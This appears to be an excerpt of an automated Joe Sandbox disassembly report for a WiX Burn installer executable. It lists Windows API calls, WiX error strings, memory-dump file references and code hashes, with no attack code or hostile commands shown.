                                                                                                                                                          • API String ID: 3660427363-3324079972
                                                                                                                                                          • Opcode ID: 2cc164cc7f9cf109e49c945b95f838a9125cfb8ace9ade2d67fb0ba292c5f956
                                                                                                                                                          • Instruction ID: 290639a0c054d5f10c08911b0bc5a2675cc1542ee5e2199064569b044b6c4dd7
                                                                                                                                                          • Opcode Fuzzy Hash: 2cc164cc7f9cf109e49c945b95f838a9125cfb8ace9ade2d67fb0ba292c5f956
                                                                                                                                                          • Instruction Fuzzy Hash: AD01DF36B4411577D720255A4C49E6B2A5EDBC5B78F65403BBE08EB350E9688C02C3E9
                                                                                                                                                          APIs
                                                                                                                                                          • RegQueryInfoKeyW.ADVAPI32(?,0046FFBE,004221A7,?,00000000,004221A7,?,00000000,00000001,00000000,00020019,004221A7,?,?,00020019,00000000), ref: 00467C35
                                                                                                                                                          Strings
                                                                                                                                                          • d:\a\wix\wix\src\libs\dutil\wixtoolset.dutil\regutil.cpp, xrefs: 00467C5A, 00467C60, 00467C71
                                                                                                                                                          • Failed to get the number of subkeys and values under registry key., xrefs: 00467C66
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.2189052829.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000000.00000002.2189036895.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189094487.0000000000477000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189123511.00000000004B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189170621.00000000004C9000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_thcdVit1dX.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: InfoQuery
                                                                                                                                                          • String ID: Failed to get the number of subkeys and values under registry key.$d:\a\wix\wix\src\libs\dutil\wixtoolset.dutil\regutil.cpp
                                                                                                                                                          • API String ID: 1673771737-3658619222
                                                                                                                                                          • Opcode ID: b0fcacae01055737b1daad296dc384e18ed7dbb5abcdab4f457d3378dbe14303
                                                                                                                                                          • Instruction ID: cadbb6325aa2e5fd58672e16574e9a26d5c449049719bf9966237132b4936f93
                                                                                                                                                          • Opcode Fuzzy Hash: b0fcacae01055737b1daad296dc384e18ed7dbb5abcdab4f457d3378dbe14303
                                                                                                                                                          • Instruction Fuzzy Hash: 56F0AF7664429977E7301A1B8C0CE5B7E2EEBD2BA4F05002EBE08AA250E5294C11D1B9
                                                                                                                                                          APIs
                                                                                                                                                          • RegSetValueExW.ADVAPI32(?,0041847B,00000000,00000000,00000000,?,?,?), ref: 004686E8
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.2189052829.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000000.00000002.2189036895.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189094487.0000000000477000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189123511.00000000004B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189170621.00000000004C9000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_thcdVit1dX.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: Value
                                                                                                                                                          • String ID: Failed to set %ls value.$d:\a\wix\wix\src\libs\dutil\wixtoolset.dutil\regutil.cpp
                                                                                                                                                          • API String ID: 3702945584-2835911124
                                                                                                                                                          • Opcode ID: 76b00cf2a33c9b5c2d2562e6fcf45d2f0954f7088859fb10c7691729b204c2a1
                                                                                                                                                          • Instruction ID: 2e407d5c064193f76dcd2602af52b00b3f092a452e06eef7a0df20c3e33ca053
                                                                                                                                                          • Opcode Fuzzy Hash: 76b00cf2a33c9b5c2d2562e6fcf45d2f0954f7088859fb10c7691729b204c2a1
                                                                                                                                                          • Instruction Fuzzy Hash: AEF0C2762001547BE720151B8C08E5B3B2EDBC2BB5F15003FBE04AB250FA398C0192BD
                                                                                                                                                          APIs
                                                                                                                                                          • GetNativeSystemInfo.KERNEL32(?), ref: 0040B0EC
                                                                                                                                                          Strings
                                                                                                                                                          • Failed to set variant value., xrefs: 0040B11E
                                                                                                                                                          • d:\a\wix\wix\src\burn\engine\variable.cpp, xrefs: 0040B130
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.2189052829.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000000.00000002.2189036895.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189094487.0000000000477000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189123511.00000000004B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189170621.00000000004C9000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_thcdVit1dX.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: InfoNativeSystem
                                                                                                                                                          • String ID: Failed to set variant value.$d:\a\wix\wix\src\burn\engine\variable.cpp
                                                                                                                                                          • API String ID: 1721193555-3107679958
                                                                                                                                                          • Opcode ID: 711637c9f5013a8519c70cbef22cc85bf0ca09c9464a4649f914bdae7912eadd
                                                                                                                                                          • Instruction ID: d94158b933fc53d8e4e3ec29addf39fcabbac702ae9253245cd8422736e58768
                                                                                                                                                          • Opcode Fuzzy Hash: 711637c9f5013a8519c70cbef22cc85bf0ca09c9464a4649f914bdae7912eadd
                                                                                                                                                          • Instruction Fuzzy Hash: 58F02672D006287ADF109A98DC0AADEBBB4EB04750F104436F504FA190E3749A04CBD5
                                                                                                                                                          APIs
                                                                                                                                                            • Part of subcall function 0046B065: SysAllocString.OLEAUT32(00000000), ref: 0046B079
                                                                                                                                                            • Part of subcall function 0046B065: VariantInit.OLEAUT32(?), ref: 0046B085
                                                                                                                                                            • Part of subcall function 0046B065: VariantClear.OLEAUT32(?), ref: 0046B174
                                                                                                                                                            • Part of subcall function 0046B065: SysFreeString.OLEAUT32(00000000), ref: 0046B17F
                                                                                                                                                          • SysFreeString.OLEAUT32(00000000), ref: 0046B37D
                                                                                                                                                          Strings
                                                                                                                                                          • Failed to get value from attribute., xrefs: 0046B33F
                                                                                                                                                          • d:\a\wix\wix\src\libs\dutil\wixtoolset.dutil\xmlutil.cpp, xrefs: 0046B34E
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.2189052829.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000000.00000002.2189036895.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189094487.0000000000477000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189123511.00000000004B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189170621.00000000004C9000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_thcdVit1dX.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: String$FreeVariant$AllocClearInit
                                                                                                                                                          • String ID: Failed to get value from attribute.$d:\a\wix\wix\src\libs\dutil\wixtoolset.dutil\xmlutil.cpp
                                                                                                                                                          • API String ID: 3379191133-1580495515
                                                                                                                                                          • Opcode ID: 619628eb6833e64647047f7286877c1a4404714b9ef8f529577334135c4b55cd
                                                                                                                                                          • Instruction ID: 156435b1f3d9b202f30eb06ef9f0e1001646f713fd51de9c6936d52e83e9c953
                                                                                                                                                          • Opcode Fuzzy Hash: 619628eb6833e64647047f7286877c1a4404714b9ef8f529577334135c4b55cd
                                                                                                                                                          • Instruction Fuzzy Hash: 77F04431B41218FBDB119F91CD06F9E3B24DB01754F100066FD00B5291E7795F90D6DA
                                                                                                                                                          APIs
                                                                                                                                                          • GetSystemDefaultLangID.KERNEL32 ref: 0040A4E4
                                                                                                                                                          Strings
                                                                                                                                                          • Failed to set variant value., xrefs: 0040A4FE
                                                                                                                                                          • d:\a\wix\wix\src\burn\engine\variable.cpp, xrefs: 0040A510
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.2189052829.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000000.00000002.2189036895.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189094487.0000000000477000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189123511.00000000004B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189170621.00000000004C9000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_thcdVit1dX.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: DefaultLangSystem
                                                                                                                                                          • String ID: Failed to set variant value.$d:\a\wix\wix\src\burn\engine\variable.cpp
                                                                                                                                                          • API String ID: 706401283-3107679958
                                                                                                                                                          • Opcode ID: 29a1f41b461a18c123c0fcb6132abed3a7cda5116dde086484a85244d265b551
                                                                                                                                                          • Instruction ID: 14bf2eedd005755cb1bf5736a53f55950823844007eac1536515ff655d95310e
                                                                                                                                                          • Opcode Fuzzy Hash: 29a1f41b461a18c123c0fcb6132abed3a7cda5116dde086484a85244d265b551
                                                                                                                                                          • Instruction Fuzzy Hash: 93E0CD3278173037D51135559C0BFFA765CDB51B62FC08077FE44B92C1DA68991047E9
                                                                                                                                                          APIs
                                                                                                                                                          • GetUserDefaultLangID.KERNEL32 ref: 0040A534
                                                                                                                                                          Strings
                                                                                                                                                          • Failed to set variant value., xrefs: 0040A54E
                                                                                                                                                          • d:\a\wix\wix\src\burn\engine\variable.cpp, xrefs: 0040A560
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.2189052829.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000000.00000002.2189036895.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189094487.0000000000477000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189123511.00000000004B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189170621.00000000004C9000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_thcdVit1dX.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: DefaultLangUser
                                                                                                                                                          • String ID: Failed to set variant value.$d:\a\wix\wix\src\burn\engine\variable.cpp
                                                                                                                                                          • API String ID: 768647712-3107679958
                                                                                                                                                          • Opcode ID: 322b7a5b49b904fb3c50d7cab49c3e43053c8df8b0abd716267bdb729de2fe51
                                                                                                                                                          • Instruction ID: d24ebfe976d358c1f92f65ba8398d69b5b6a1efe62aa83a86c9f9b6f70f08616
                                                                                                                                                          • Opcode Fuzzy Hash: 322b7a5b49b904fb3c50d7cab49c3e43053c8df8b0abd716267bdb729de2fe51
                                                                                                                                                          • Instruction Fuzzy Hash: A7E0862278172036D51161555C07FAA7618DB10B72F804076F944BA2C1EA68995042E9
                                                                                                                                                          APIs
                                                                                                                                                          • GetUserDefaultUILanguage.KERNEL32 ref: 0040A584
                                                                                                                                                          Strings
                                                                                                                                                          • Failed to set variant value., xrefs: 0040A59E
                                                                                                                                                          • d:\a\wix\wix\src\burn\engine\variable.cpp, xrefs: 0040A5B0
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.2189052829.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000000.00000002.2189036895.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189094487.0000000000477000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189123511.00000000004B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189170621.00000000004C9000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_thcdVit1dX.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: DefaultLanguageUser
                                                                                                                                                          • String ID: Failed to set variant value.$d:\a\wix\wix\src\burn\engine\variable.cpp
                                                                                                                                                          • API String ID: 95929093-3107679958
                                                                                                                                                          • Opcode ID: fe63fcfdce0a1c05a03273a5dbb892b46eb5fc8355951d983aa04017306173ea
                                                                                                                                                          • Instruction ID: 6b2e6a620de21c70f0fac33a6ac481298e0efd1fbd217ec82df30a668839c3d8
                                                                                                                                                          • Opcode Fuzzy Hash: fe63fcfdce0a1c05a03273a5dbb892b46eb5fc8355951d983aa04017306173ea
                                                                                                                                                          • Instruction Fuzzy Hash: A4E0CD3278173037D51131459C07FEA765CDB10B62FC04077FD44B92C1DB58991043E9
                                                                                                                                                          APIs
                                                                                                                                                          • ___delayLoadHelper2@8.DELAYIMP ref: 004765B9
                                                                                                                                                            • Part of subcall function 00407E32: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00407EA5
                                                                                                                                                            • Part of subcall function 00407E32: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00407EB6
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.2189052829.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000000.00000002.2189036895.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189094487.0000000000477000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189123511.00000000004B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189170621.00000000004C9000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_thcdVit1dX.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                          • String ID: FfG$vfG
                                                                                                                                                          • API String ID: 1269201914-721077178
                                                                                                                                                          • Opcode ID: b62cb9bf37e707242d67b898093e4c75cf1f8dfc9be60b2ae6795fc0d8ff1672
                                                                                                                                                          • Instruction ID: 64833f0aca6340f51689f4517e2430ba41064f504f23b12900a080944e0650db
                                                                                                                                                          • Opcode Fuzzy Hash: b62cb9bf37e707242d67b898093e4c75cf1f8dfc9be60b2ae6795fc0d8ff1672
                                                                                                                                                          • Instruction Fuzzy Hash: F2B0128129E001BC3144A15BBC06E77018DDAC0B11331C02FF00CC0084D9AC1C03107F
                                                                                                                                                          APIs
                                                                                                                                                          • ___delayLoadHelper2@8.DELAYIMP ref: 004765B9
                                                                                                                                                            • Part of subcall function 00407E32: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00407EA5
                                                                                                                                                            • Part of subcall function 00407E32: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00407EB6
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.2189052829.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000000.00000002.2189036895.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189094487.0000000000477000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189123511.00000000004B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189170621.00000000004C9000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_thcdVit1dX.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                          • String ID: VfG$vfG
                                                                                                                                                          • API String ID: 1269201914-1294229364
                                                                                                                                                          • Opcode ID: 20a40eea3461ce1ef76eec977ac4bb348b470bb838badb00d68e72e085022a2a
                                                                                                                                                          • Instruction ID: b5dc681d7335ff58fc4db84534a66b8240e91f6b0b80de9a071126e24dd606c4
                                                                                                                                                          • Opcode Fuzzy Hash: 20a40eea3461ce1ef76eec977ac4bb348b470bb838badb00d68e72e085022a2a
                                                                                                                                                          • Instruction Fuzzy Hash: 3DB0128169D001FC7144E16FAC0AD77014DC6D0B15331C13FF50CC0084D98C5C06107F
                                                                                                                                                          APIs
                                                                                                                                                          • ___delayLoadHelper2@8.DELAYIMP ref: 004765B9
                                                                                                                                                            • Part of subcall function 00407E32: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00407EA5
                                                                                                                                                            • Part of subcall function 00407E32: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00407EB6
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.2189052829.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000000.00000002.2189036895.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189094487.0000000000477000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189123511.00000000004B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189170621.00000000004C9000.00000020.00000001.01000000.00000003.sdmpDownload File
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_thcdVit1dX.jbxd
Similarity
• API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
• String ID: ffG$vfG
• API String ID: 1269201914-3846699558
APIs
• ___delayLoadHelper2@8.DELAYIMP ref: 004765B9
  • Part of subcall function 00407E32: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00407EA5
  • Part of subcall function 00407E32: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00407EB6
Strings
Similarity
• API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
• String ID: &fG$vfG
• API String ID: 1269201914-2706149215
APIs
• ___delayLoadHelper2@8.DELAYIMP ref: 004765B9
  • Part of subcall function 00407E32: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00407EA5
  • Part of subcall function 00407E32: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00407EB6
Strings
Similarity
• API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
• String ID: 6fG$vfG
• API String ID: 1269201914-3331462033
APIs
• CloseHandle.KERNEL32(00477808,00000000,00000000,?,00450B45,00000000,00000008,?,000000FF,0043B8B7,?,004508A0,8000FFFF,?,00000000), ref: 0041AB84
• CloseHandle.KERNEL32(00477820,00000000,00000000,?,00450B45,00000000,00000008,?,000000FF,0043B8B7,?,004508A0,8000FFFF,?,00000000), ref: 0041AB95
• CloseHandle.KERNEL32(00477838,00000000,00000000,?,00450B45,00000000,00000008,?,000000FF,0043B8B7,?,004508A0,8000FFFF,?,00000000), ref: 0041ABA6
• CloseHandle.KERNEL32(00000000,00000000,00000000,?,00450B45,00000000,00000008,?,000000FF,0043B8B7,?,004508A0,8000FFFF,?,00000000), ref: 0041ABB8
Similarity
• API ID: CloseHandle
• String ID:
• API String ID: 2962429428-0